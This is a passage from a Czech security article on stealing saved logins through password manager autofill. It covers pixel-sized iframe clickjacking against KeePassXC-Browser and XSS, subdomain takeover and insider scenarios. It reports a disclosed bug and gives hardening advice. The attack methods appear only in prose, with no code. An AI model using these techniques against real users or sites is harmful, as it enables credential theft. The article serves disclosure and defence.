Testovací stránka se skriptem: https://websecurity.dev/password-managers/clickjacking/ Obecným problémem v tomto případě je, že doplněk není vždy navrchu (on-top). Kromě zmíněného zneviditelnění ikony, je možné části doplňku (ikonu) překrýt nebo ovlivnit jeho viditelnou část. Níže lze vidět zmenšenou šířku iframu, který ovlivňuje viditelnou část ikony. Další způsob zneužití by tedy spočíval v tom, že by měl iframe velikost 1x1 px a obsah v něm by byl zacílen přesně na ikonu. Tento pixelový iframe by kvůli své velikosti nebyl vidět ani při nastavení opacity:1 . Iframe by měl pozici vždy pod kurzorem a technika by byla stejná – kamkoliv by uživatel kliknul, tak by došlo k doplnění údajů. V případě, že je uloženo více údajů na dané doméně, tak je uživateli zobrazen našeptávač. V iframu je i tento našeptávač uživateli skryt. Zneužití u KeePassXC-Browser je tedy možné i při více uložených údajích. Níže si můžete vidět, jak toto řeší správce hesel LastPass. Našeptávač je nad poloprůhledným iframemem, beze změny velikosti nebo průhlednosti. Roboform také doplňuje údaje do formuláře jedním klikem, ale tuto zranitelnost nemá. Našeptávač je také vždy navrchu (nad rámem) a beze změny průhlednosti. K využití této zranitelnosti dochází pouze v případě, je-li heslo uloženo přes KeePassXC-Browser. Jestliže je heslo prvně uloženo do KeePassXC, tak se vždy uživateli zobrazí potvzovací dialog. Zranitelnost byla nahlášena a bude brzy opravena: https://github.com/keepassxreboot/keepassxc-browser/issues/1367

Potenciální rizika pro uživatele Každému uživateli, který používá automatické vyplňování můžou být ukradeny uložené přihlašovací údaje. Odcizen může být vždy pouze jeden uložený údaj (více v části Limitace) a jen pro doménu, kde byl vložen kód od útočníka. Jediné, co musí uživatel provést je, že navštíví stránku, která byla útočníkem upravena. Příklad – Stored XSS:

Útočník nalezne Stored XSS na stránkách Alzy. Nalezená zranitelnost je v části pro recenzi produktu. Jelikož útočník není omezen koupí produktu, tak napíše recenzi pod každý produkt s využitím XSS (vloží k nim externí sript). Tento vložený skript bude využívat výše popsané metody. Každému uživateli, který má uložené heslo pro server Alza.cz ve svém prohlížeči nebo správci hesel a zároveň používá automatické vyplňování, by při návštěvě libovolného produktu došlo ke krádeži jeho uložených údajů. Příklad – Reflected XSS:

Útočník nalezne Reflected XSS na stránkách Facebooku. Jelikož se jedná o Reflected XSS, tak útočník celou URL skryje zkracovačem (bit.ly) nebo přes Open Redirect zranitelnost. Každému uživateli, který má pro Facebook uložené heslo a ve svém prohlížeči nebo správci hesel a zároveň používá automatické vyplňování, by při otevření odkazu došlo ke krádeži jeho uložených přihlašovacích údajů. Problémem je, že uživatel předem neví, jestli na webové stránce je nebo není vložen cizí kód. Jako příklad bych uvedl, že v minulém roce jsem nahlásil XSS zranitelnost na stránkách Kosik.cz, Rohlik.cz nebo třeba Damejidlo.cz. Jedná se tedy o věrohodné stránky, které byly v minulém roce velmi navštěvované kvůli covidové situaci. Pokud útočník objevil zranitelnost před mojim nahlášením, tak mohl výše popsanou techniku na uživatelích použít. Používá-li uživatel vždy unikátní vygenerované heslo a současně má na webové aplikaci zapnuté 2FA/MFA, tak ho případný únik hesla nemusí až tolik trápit. V jiném případě, nemá-li uživatel zapnuté 2FA/MFA na webové aplikaci, tak případný únik hesla může být problematický, jelikož se může útočník opakově přihlašovat k jeho účtu. Pokud bylo ukradeno uživateli neunikátní heslo používané i u jiné služby, tak v tomto případě získal útočník i přístup k jiné službě oběti (pokud tam není použito 2FA/MFA). Dojde-li ke krádeži hesla výše popsanou metodou, tak se uživatel o úniku nedozví, a to ani při použití stránky https://haveibeenpwned.com. Provozovatel stránky, kde k úniku došlo, nemůže tento únik zjistit. Jedná se totiž o metodu využívající zranitelnosti na klientské straně (XSS) a špatného nastavení pro autofill ve správci hesel.

Potenciální rizika pro společnosti / Doporučení pro InfoSec Je dost možné, že mnozí zaměstnanci používají v rámci bezpečnostních procesů nějakého správce hesel. Z výše popsaných výsledků je nutné upozornit, aby nepoužívali právě autofill funkci. Běžně se zaměstnanci přihlašují na webové aplikace např. email, Jira, Confluence, GitHub/GitLab a jiné. V případě, že je nalezena zranitelnost, která umožňuje útočníkovi vložit vlastní javascriptový kód na stránku (XSS, Subdomain Takeover, Web Cache Poisoning apod.), tak je schopen získat přihlašovací údaje zaměstnance, a to v plaintextu. Kromě běžných přihlašovacích údajů může útočník také získat AD údaje, jelikož se obvykle pro interní stránky používá AD login. Žádné vyplňování formulářů na phishing stránce. Útočníkovi by stačilo, aby zaměstnanec otevřel zranitelnou stránku na (sub)doméně společnosti. V případě, že má zaměstnanec uložené heslo a používá automatické vyplňování, tak by došlo k odcizení jeho přihlašovacích údajů. Příklad – útok „insidera“:

Insider zjistí, že se používá Confluence verze, která je zranitelná na Stored XSS. Této znalosti využije a uloží na velmi navštěvované stránce skript. Každému zaměstnanci, který má pro Confluence uložené heslo se zapnutým autofillem a navštíví změněnou Confluence stránku, budou ukradeny přihlašovací údaje. Jedná se o útok na stejné subdoméně. V základním nastavení má autofill zapnuto 9 správců (s Keeperem a zranitelným KeePassXC-Browser je to celkově 11)

Útok může být také proveden externím útočníkem, zná-li útočník Reflected XSS zranitelnost u dané webové aplikace (např. Jira, Confluence). Ke kradeži uložených údajů by poté došlo jen, pokud by zaměstnanec otevřel útočníkův odkaz. Příklad – externí útočník:

Útočník nalezne subdoménu zranitelnou na Subdomain Takeover. Na doméně uloží vlastní skript a odešle odkaz společnosti v rámci bugbounty programu. Zaměstnanec používající správce hesel, který automaticky doplňuje hesla i na jiné subdoméně, může být v ohrožení. Útočník by si mohl předem zjistit, že ve společnosti používají emailové služby od Microsoftu (Microsoft 365) a upravil by podle toho nový přihlašovací formulář. Proč zrovna emailové služby od Microsoftu? Narozdíl od Google, u Microsoftu obvykle dochází při přihlášení k přesměrování na subdoménu organizace -> uložené heslo na subdoméně. U zaměstnance, který by tedy používal automatické vyplňování na svém emailu a otevřel by „subdomain takeover“ odkaz, by tak došlo ke krádeži jeho uložených údajů. Jedná se o útok na jiné subdoméně, než kde byly údaje uloženy. Uložené heslo by bylo možné získat u správců LastPass, Bitwarden a Roboform. Video je pouze ilustrační. K přihlašovanému emailu nemám přístup.

(Bitwarden byl ve výchozí konfiguraci s dodatečně zapnutým autofillem bez dalšího nastavení.)

Doporučení Všem uživatelům bych doporučil funkci automatického vyplňování zcela vypnout. Dle výše popsané analýzy si lze povšimnout, že tato funkce má více negativ než pozitiv. Všichni správci hesel by měli mít možnost vypnout autofill. Vypnutí u prohlížečů může být ale problematické. U chromium-based prohlížečů není tato možnost vůbec k dispozici (s výjimkou Microsoft Edge). Pokud nechcete, aby se Vám automaticky doplňovaly uložené údaje, je jediným řešením smazat uložené heslo. Nově u Microsoft Edge (verze 92.0.902.55) je možné nastavit, že se vyplní heslo až po zadání systémového hesla. Tuto změnu lze provést v Settings -> Passwords ( edge://settings/passwords ). Zde v části „Sign In“ vybrat „With device password“. Microsoft Edge 91.0.864.64 (testovaná verze), 91.0.864.71 Microsoft Edge 92.0.902.55 Ve Firefoxu je možné automatické vyplňování zakázat v nastavení, konkrétně v části „Soukromí a zabezpečení“ ( about:preferences#privacy ) -> „Přihlašovací údaje“ je možné odškrtnout „Automaticky vyplňovat přihlašovací údaje“. Pokud i přes všechna negativa chcete automatický autofill používat, ať už kvůli kontrole phishingu nebo kvůli pohodlí při přihlašování, tak bych doporučil nastavit si alespoň tyto změny: Ve správci hesel si nastavte automatické vyplňování pouze pro konkrétní URL, kde k uložení údajů došlo – nejenom základní doménu. V chromium-based prohlížeči si u rozšíření nastavte, že správce hesel bude aktivní až po kliknutí na ikonu (chrome://extensions -> details -> site access). Pokud se budete chtít přihlásit, tak vždy jen kliknete na ikonu doplňku a vyberete „Načíst znovu“ nebo „Reload“. Správce hesel se až v ten moment stane aktivním a doplní údaje. Používejte automatické vyplňování, které vyžaduje uživatelskou interakci – pro vyplnění údajů kliknete na daný údaj v UI ve správci hesel. Nejideálnějším nastavením by byla poslední možnost. Pokud ale chcete, aby vaše údaje byly předvyplněné, tak bych doporučoval kombinaci prvních dvou možností. Bohužel někteří správci nenabízí pokročilejší nastavení pro autofill. Podobné je to i prohlížečů. Kromě chromium-based prohlížečů může být problém nastavit aktivaci rozšíření na kliknutí. Pokud si nastavíte nějakou z prvních dvou možností, je nutné počítat s omezením nebo riziky: Přihlašovací URL může provozovatel různě měnit. Dojde-li k této změně, tak se Vám údaje automaticky nedoplní a bude nutné upravit URL v nastavení správce. Při aktivaci doplňku na kliknutí, je správce hesel aktivní i po přihlášení – pokud se nezměnila doména, ale jen cesta v URL. Správce je takto zapnutý pouze pro aktuální tab. Riziko krádeže přihlašovacích údajů tedy hrozí, jestliže po přihlášení (po aktivaci správce hesel) otevřete upravenou stránku od útočníka na dané doméně.



(Příklad: Po kliknutí na ikonu se přihlásíte ke svému účtu na https://example.com/login. Po přihlášení jste přesměrován ke svému účtu https://example.com/account – správce hesel je stále aktivní. Pokud v aktuálním tabu otevřete nějakou upravenou stránku na doméně https://example.com, tak může dojít ke krádeži údajů)

Závěr Vím, že toto není žádná nová technika. Pro mě je pouze nepochopitelné, že i v dnešní době je stále tolik správců, kteří mají zapnutý autofill v základním nastavení. Dále nerozumím tomu, že v médiích je tato funkce spíše popisována jako užitečná funkce pro rozpoznání phishing stránky, případně jako funkce, kterou by měl každý dobrý správce hesel mít. Dle mého názoru má tato funkce zanedbatelný přínos v porovnání s tím, jaká rizika může pro běžného uživatele skrývat. Phishingovou stránku je možné poměrně jednoduše rozpoznat. Avšak zjistit při běžném prohlížení webů, zda-li je na stránce vložen cizí skript, je už velice obtížné i pro zkušené IT specialisty. Dojde-li k úniku přihlašovacích údajů na nějaké stránce, nemusí to nutně znamenat, že se útočník dostal do databáze. Mohl jen využít XSS nebo jiné client-side zranitelnosti a získal přihlašovací údaje od uživatelů, kteří se řídili pouze radou, že by měli používat správce hesel. Prosím tedy, v případě doporučování správců hesel dodávejte, ať si automatické vyplňování údajů vypnou nebo alespoň nastaví na vyplňování pouze na jejich žádost. Zapnuté automatické vyplňování v základním nastavení mělo 9 ze 16 testovaných správců a prohlížečů. Při započtení Keeperu, který se ptá uživatele na autofill a uživateli zvýrazňuje souhlas, a také momentálně zranitelného KeePassXC-Browser, je možné celkově u 11 správců v základním nastavení získat uložené heslo do jednoho kliku myší. Pokud je autofill dodatečně zapnut bez další konfigurace, tak je to celkově 13 správců hesel, u kterých je možné získat uložené heslo, pokud je stránka zranitelná na XSS (nebo podobný typ zranitelnosti). Doufám, že jsem vám tímto článkem přiblížil možná rizika při použití autofill funkce. Jestliže ve svém prohlížeči nyní uvidíte vyplněný přihlašovací formulář bez vašeho vědomí, tak doufám, že to bude pro vás podnět k zamyšlení nad případnou úpravou autofillu ve vašem správci hesel. 🙂